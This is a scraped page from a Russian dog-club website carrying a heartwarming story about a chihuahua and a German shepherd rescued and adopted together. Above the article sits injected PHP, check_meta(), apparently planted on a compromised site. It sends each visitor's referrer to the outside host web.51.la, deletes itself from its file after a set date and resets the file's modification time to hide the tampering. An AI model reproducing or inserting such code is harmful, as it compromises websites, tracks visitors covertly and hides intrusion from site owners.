check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } О любви чихуахуа и овчарки
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости О любви чихуахуа и овчарки

О любви чихуахуа и овчарки

E-mail Печать PDF
>"Пожалуйста, не разлучайте нас!" - чихуахуа влез на своего друга и никому не позволял его забирать…

Джеф и Джерико – довольно контрастная парочка. Около месяца назад о них сообщили в Аризонское гуманное сообщество с просьбой забрать их, так как прежний владелец больше не мог за ними ухаживать.

Работники сообщества отправились за собаками. Каково же было их удивление, когда они пытались увезти псов! Один из них, немецкая овчарка, был болен и нуждался в медицинской помощи (его укусил клещ).

Но его друг, чихуахуа, не давал к нему подойти! Он залез на своего друга и требовал забрать его вместе с ним.

Видимо, он не понимал, что их хозяин отказался от них обоих и пытался любым способом остаться со своим товарищем. Вскоре спасателям всё же удалось подобраться к друзьям и забрать их в приют.

Врачи сразу же начали лечение здоровяка Джерико. Чихуахуа Джеф постоянно был рядом с ним и ни на шаг от него не отходил. Стало понятно, что эти двое должны отправиться в новую семью только вместе. Их нельзя было разлучать…

Постепенно Джерико шёл на поправку. Болезнь была позади и он снова мог играть со своим старым другом. Эти ребята постоянно общались и спали вместе. Как оказалось, они через многое прошли вместе.

Прошло совсем немного времени, как им пришлось искать новый дом. Работники сообщества дали несколько объявлений в социальных сетях и вскоре для неразлучных товарищей нашлись хозяева!



Эти прекрасные женщины увидели ребят и они напомнили им об их собственной долгой дружбе. Решение было принято немедленно: подруги сели в машину и направились забирать собак.

Теперь Джеф и Джерико снова живут в семье. Их любят и заботятся о них, а они в свою очередь – друг о друге.

Пёсики остались вдвоём и огромная благодарность тем людям, которые не посмели их разлучить!




Источник http://daylapu.ru/news.php?ngod=2017&news=109
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

 .JPG

Реклама


Похожие материалы